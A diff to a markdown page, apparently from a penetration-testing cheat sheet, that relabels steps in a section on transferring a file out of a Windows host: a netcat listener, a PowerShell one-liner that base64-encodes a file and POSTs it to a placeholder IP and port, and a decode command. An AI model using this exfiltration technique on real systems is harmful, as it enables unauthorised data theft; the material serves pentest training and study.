Roothulhu/Pwnomicon/docs/04-file-transfers.md

 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<details>
 <summary><h4>PowerShell Base64 Web Upload</h4></summary>

-1. We use Netcat to listen in on a port we specify and send the file as a POST request.
+**Source Machine: We use Netcat to listen in on a port we specify and send the file as a POST request.**
 ```bash
 nc -lvnp <PORT>
 ```

-2. PowerShell Script to Upload a File to Python Upload Server
+**Destination Machine: PowerShell Script to Upload a File to Python Upload Server**
 ```powershell
 $b64 = [System.convert]::ToBase64String((Get-Content -Path '<FILE PATH>' -Encoding Byte))
 Invoke-WebRequest -Uri http://<IP>:<PORT>/ -Method POST -Body $b64
 ```

-3. We copy the output and use the base64 decode function to convert the base64 string into a file.
+**Source Machine: We copy the output and use the base64 decode function to convert the base64 string into a file.**
 ```bash
 echo <BASE64 FILE> | base64 -d -w 0 > <FILE>
 ```